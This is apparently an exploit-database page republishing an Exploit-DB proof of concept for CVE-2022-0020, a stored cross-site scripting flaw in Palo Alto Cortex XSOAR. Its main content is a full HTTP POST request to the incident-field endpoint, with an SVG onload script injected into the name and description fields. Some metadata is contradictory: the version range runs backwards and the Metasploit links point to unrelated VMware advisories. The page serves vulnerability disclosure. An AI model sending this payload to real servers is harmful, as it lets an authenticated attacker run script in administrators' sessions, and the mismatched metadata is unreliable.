header-logo
Suggest Exploit
vendor:
Cortex XSOAR
by:
Omur UGUR
5.4
CVSS
MEDIUM
Stored Cross-Site Scripting (XSS)
79
CWE
Product Name: Cortex XSOAR
Affected Version From: 6.5.2000
Affected Version To: 6.2.2000
Patch Exists: YES
Related CWE: CVE-2022-0020
CPE: a:palo_alto_networks:cortex_xsoar
Metasploit: https://www.rapid7.com/db/vulnerabilities/vmsa-2022-0020-cve-2022-26373/https://www.rapid7.com/db/vulnerabilities/vmsa-2022-0020-cve-2022-28693/https://www.rapid7.com/db/vulnerabilities/vmsa-2022-0020-cve-2022-23816/https://www.rapid7.com/db/vulnerabilities/vmsa-2022-0020-cve-2022-23825/https://www.rapid7.com/db/vulnerabilities/vmsa-2022-0020-cve-2022-29901/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=159306https://www.infosecmatter.com/nessus-plugin-library/?id=147279https://www.infosecmatter.com/nessus-plugin-library/?id=153544https://www.infosecmatter.com/nessus-plugin-library/?id=153545https://www.infosecmatter.com/nessus-plugin-library/?id=153889https://www.infosecmatter.com/nessus-plugin-library/?id=160592https://www.infosecmatter.com/nessus-plugin-library/?id=149902https://www.infosecmatter.com/nessus-plugin-library/?id=157319https://www.infosecmatter.com/nessus-plugin-library/?id=135411https://www.infosecmatter.com/nessus-plugin-library/?id=157325
Platforms Tested: Windows, Linux, Mac
2022

Palo Alto Cortex XSOAR 6.5.0 – Stored Cross-Site Scripting (XSS)

A stored cross-site scripting (XSS) vulnerability in Palo Alto Network Cortex XSOAR web interface enables an authenticated network-based attacker to store a persistent javascript payload that will perform arbitrary actions in the Cortex XSOAR web interface on behalf of authenticated administrators who encounter the payload during normal operations.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020
# Version: 6.5.0 - 6.2.0 - 6.1.0
# Tested on: [relevant os]
# CVE : CVE-2022-0020
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr


A stored cross-site scripting (XSS) vulnerability in Palo Alto Network
Cortex XSOAR web interface enables an authenticated network-based attacker
to store a persistent javascript payload that will perform arbitrary
actions in the Cortex XSOAR web interface on behalf of authenticated
administrators who encounter the payload during normal operations.

POST /acc_UAB(MAY)/incidentfield HTTP/1.1
Host: x.x.x.x
Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;
isTimLicense=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)
Gecko/20100101 Firefox/94.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://x.x.x.x/acc_UAB(MAY)
Content-Type: application/json
X-Xsrf-Token:
Api_truncate_results: true
Origin: https://x.x.x.x
Content-Length: 373
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field
edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}

Regards,

Omur UGUR

>

Navigation

Suggest Exploit

Services By CQR